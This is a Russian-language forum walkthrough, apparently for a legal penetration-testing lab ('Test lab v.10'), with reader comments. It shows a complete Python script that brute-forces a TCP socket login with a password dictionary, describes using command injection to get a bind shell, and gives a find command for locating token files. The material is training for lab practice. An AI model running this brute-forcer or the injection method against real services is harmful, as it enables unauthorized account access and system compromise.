Лаборатория тестирования на проникновение «Test lab v.10» — за гранью хакерских возможностей (4)

Глава 4​

Предыдущая глава
Следующая глава
Оглавление

Приветствую вас колеги.
Сегодня настало время очередного токена.
Сегодня будем побеждать Web Control (192.168.0.6) и рассмотрим такой вектор как Command Injection.
Почитать про Command Injection можно тут, тут. Но также вспомним про атаку на слабые пароли методом брутфорса.
Для начала ,как всегда просканим порты:

Пробуем подключится с помощью нетката:

Видим обычную tcp socket аутентификацию... Первое что на ум приходит при встрече с аутентификацией - это перебор пароля на легкие словарные пароли.
Что мы в первую очередь и будем пробовать.
Для удобства я пробросил порт,как это делать я описывал в прошлой статье

Но стандартных брутфорсов для таких целей я также пока не встречал,по этому на помощь снова приходят базовые знание программирования на питон. Набросал простенький скрипт для перебора паролей - я прогнал его по учетным записям из уже известным нам (которые мы получили на ssh машине) ,но увы мой брутфорс не дал результатов. И спустя некоторое время ковыряясь в этой корпоративной сети ,на некоторых машинах я замечал что при попытке сброса пароля например на клауде(cloud "172.16.0.3") я заметил что существует учетная запись admin. И тут на ум приходит прогнать брутфорс еще по таким учеткам как admin,root,cloud,user,test.
Брутил я словарю из john the ripper:

Я не гуру в программирование на питон,и по этому мой скрипт выглядит совсем по простому,
я использовал там только цикл для перебора по словарю,библиотеку socket для работы с tcp соединением,и обычное if else условия).Выглядит мой скрипт примерно так:

TCP_SOCKET_1503_Brute.py

import socket
from termcolor import colored

users=['admin','root','user']
with open('pass.txt','r') as fs:
    for p in fs.readlines():  
        for n in users:
            sock = socket.socket()
            sock.connect(('127.0.0.1', 1503))
            sock.recv(1024)
            sock.send(n+"\n")
            sock.recv(1024)
            sock.send(p.strip()+"\n")
            data=sock.recv(1024)
            sock.close()
            if 'Error!' in data:
                print colored('[-] ','red')+colored(n,'yellow')+' '+colored(p,'yellow')
            else:
                print colored("[+]Good ","green") +colored(n,'cyan')+' '+colored(p,'cyan')
                break      
        if 'Error' not in data:
            print colored("[ *** ] Brute Finished Succes!","magenta")
            break

К выше сказаному добавлю что использовал в скрипте расцветку (библиотека colored)
массив пользователей из трех на мой взгляд распространенных учетных записей.Затем циклически перебрал словарь,и если в ответе сервера не было фразы "Error!" то закончить цикл и вывести логин и пароль который подошел к tcp socket аутентификации.
В деле это выглядит как то так:

Получил логин и пароль,пробуем подключится. Подключившись замечаем работу какого то приложения которое работает в интерактивном режиме и которое запрашивает пользовательский ввод,а везде есть пользовательский ввод - запомните!!!- это уже повод думать что там может быть инъекция!!!!!
Вооружившись знаниями об command injection пробуем различные варианты выполнить инъекцию.

Здесь мы использовали Bind Shell , потому что ssh машина (172.16.0.8) и web_control машина (192.168.0.6) находятся в разных сегментах сети.
Подробнее о том что такое bind и reverse shell можете прочесть в моей статье для новичков.

Дальше дело за малым) Найти токен) Первым делом когда попадаю на машину я пользуюсь командой
find для поиска имен файлов которые в своем имени содержат слово "token"
Выглядит моя команда так:

find / -type f -name "*token*"

Всем спасибо) Продолжение следует)
Если понравилась статья - ставь лайк) Мне будет приятно)
Вот демо-видео :

Предыдущая глава
Следующая глава
Оглавление

 

[mafiasepa]

***Скрытый текст***

неа, другой был, но когда ввожу его пишет неверно. Запустил ещё раз минут 40 уже долбит пока не нашёл.

 

[mafiasepa]

***Скрытый текст***

теперь пароль сходится. я просмотрел в терминале ту сесию ssh там был обрыв соединения с ssh, наверное почему и выдал типо пароль такой

 

[sdfsd]

Hi help me

bash-4.2#./brt.py
  File "./brt.py", line 2
    import socket
    ^
IndentationError: unexpected indent
bash-4.2# ./brt.py
./brt.py: line 3: from: command not found
./brt.py: line 5: syntax error near unexpected token `('
./brt.py: line 5: `with open('pass.txt','r') as fs:'

python brt.py
  File "brt.py", line 2
    import socket
    ^
IndentationError: unexpected indent

bash-4.2# pip install termcolor
Requirement already satisfied: termcolor in /usr/lib64/python2.7/site-packages

 

[<~DarkNode~>]

Hi help me

bash-4.2#./brt.py
  File "./brt.py", line 2
    import socket
    ^
IndentationError: unexpected indent
bash-4.2# ./brt.py
./brt.py: line 3: from: command not found
./brt.py: line 5: syntax error near unexpected token `('
./brt.py: line 5: `with open('pass.txt','r') as fs:'

python brt.py
  File "brt.py", line 2
    import socket
    ^
IndentationError: unexpected indent

bash-4.2# pip install termcolor
Requirement already satisfied: termcolor in /usr/lib64/python2.7/site-packages

Try
python brt.py

 

[sdfsd]

Try
python brt.py

python brt.py

  File "brt.py", line 2
    import socket
    ^
IndentationError: unexpected indent

[doublepost=1483265430,1483263612][/doublepost]

python brt.py

  File "brt.py", line 2
    import socket
    ^
IndentationError: unexpected indent

усе, как-то заработало
[doublepost=1483269876][/doublepost]

почему неверный пароль???

 

[<~DarkNode~>]

python brt.py

  File "brt.py", line 2
    import socket
    ^
IndentationError: unexpected indent

[doublepost=1483265430,1483263612][/doublepost]
усе, как-то заработало
[doublepost=1483269876][/doublepost]Посмотреть вложение 8379 почему неверный пароль???

Он набросался за пару минут,его можно усовершенствовать или взять за основу для написания своего на своем ЯП. Возможно(скорее всего) скрипт не понимает обрыва ssh соединения,такое вполне возможно когда падает ссш соединение(в лаборатории как минимум раз в час машина ссш перезагружается...)
http://pastebin.com/raw/BxU2zkHN

 

[sdfsd]

Он набросался за пару минут,его можно усовершенствовать или взять за основу для написания своего на своем ЯП. Возможно(скорее всего) скрипт не понимает обрыва ssh соединения,такое вполне возможно когда падает ссш соединение(в лаборатории как минимум раз в час машина ссш перезагружается...)
***Скрытый текст***

именно так -обрыв, уже отдуплился
thank you very much

 

[Dmitry88]

теперь пароль сходится. я просмотрел в терминале ту сесию ssh там был обрыв соединения с ssh, наверное почему и выдал типо пароль такой

тоже самое вчера было. Пароль user находило, а admin нивкакую. Уже и скрипт переделывал, и другие подобные искал. Оказалось ССН обрывалась периодически. Сегодня час не мог к лабе подключиться, но когда вышло, запустил старый скрипт (только пользователя 'admin' оставил) и вуаля. 5 минут и пароль найден. Тут еще момент для таких новичков как я - после нахождения пароля скрипт продолжает поиск по словарю , пока он не закончится, по-этому вы можете просто пропустить найденный. Внимательно смотрите отработку.

 

[sdfsd]

тоже самое вчера было. Пароль user находило, а admin нивкакую. Уже и скрипт переделывал, и другие подобные искал. Оказалось ССН обрывалась периодически. Сегодня час не мог к лабе подключиться, но когда вышло, запустил старый скрипт (только пользователя 'admin' оставил) и вуаля. 5 минут и пароль найден. Тут еще момент для таких новичков как я - после нахождения пароля скрипт продолжает поиск по словарю , пока он не закончится, по-этому вы можете просто пропустить найденный. Внимательно смотрите отработку.

john -single --5sec

 

[Dmitry88]

john -single --5sec

Напишите, если не сложно с какими параметрами джонни запускали?

 

[sdfsd]

Напишите, если не сложно с какими параметрами джонни запускали?

sorry! ya poputal s drugim primerom.tut prosto skript i slovar is joha-a.5 minut s odnoy uchetkoy.

 

[Сергей Попов]

5. Условия и правила создания тем и сообщений, размещение других информационных материалов (фото, видео)

***
10. Запрещено писать транслитом. Перед размещением сообщения используйте сервисы для перевода транслита в кирилицу.​

 

[sdfsd]

sorry! Я попутал с другим примером.тут просто скрипт и словарь из jоhn-а.У меня минут 10 с одной учеткой отрабатывает

 

[@r2d2@]

Извиняюсь за свою тупость! Откуда получили порт 1337?? в скрине при подключении к 1503

 

[Sinistra]

Спасибо всё пошло, только пароль не такой

Только что его протрубил, пароль именно такой как указал DarkNode.
[doublepost=1484260019,1484259947][/doublepost]P.s. DarkNode, спасибо за скрипт и труды!

 

[Kareon07]

Все сложнее чем кажется... долго вникал.(

 

[LiJagger]

И спустя некоторое время ковыряясь в этой корпоративной сети ,на некоторых машинах я замечал что при попытке сброса пароля например на клауде(cloud "172.16.0.3") я заметил что существует учетная запись admin.

Уважаемый сенсей. Не могли бы Вы поподробнее рассказать о "попытке сброса пароля"? Спасибо)
[doublepost=1485428178,1485426010][/doublepost]

Тут еще момент для таких новичков как я - после нахождения пароля скрипт продолжает поиск по словарю , пока он не закончится, по-этому вы можете просто пропустить найденный. Внимательно смотрите отработку.

Как он может продолжить поиск, если в скрипте после нахождения правильного пароля стоит break?

 

[Dmitry88]

Уважаемый сенсей. Не могли бы Вы поподробнее рассказать о "попытке сброса пароля"? Спасибо)
[doublepost=1485428178,1485426010][/doublepost]
Как он может продолжить поиск, если в скрипте после нахождения правильного пароля стоит break?

Если указать несколько юзеров, то для некоторых тоже пароли находит. При этом поиск не прекращается.

 

[TrevorReznik]

Интересно! Я даже завел конспект куда выписываю те вещи в которых надо разобраться... такого со мной не случалось с института)))

 

[noNmUsr]

подскажите. есть ли другая команда входа в меню туннелирования в SSH ? через комбинацию "Shift" + "~" + "c" заходит в данное меню один раз на миллион...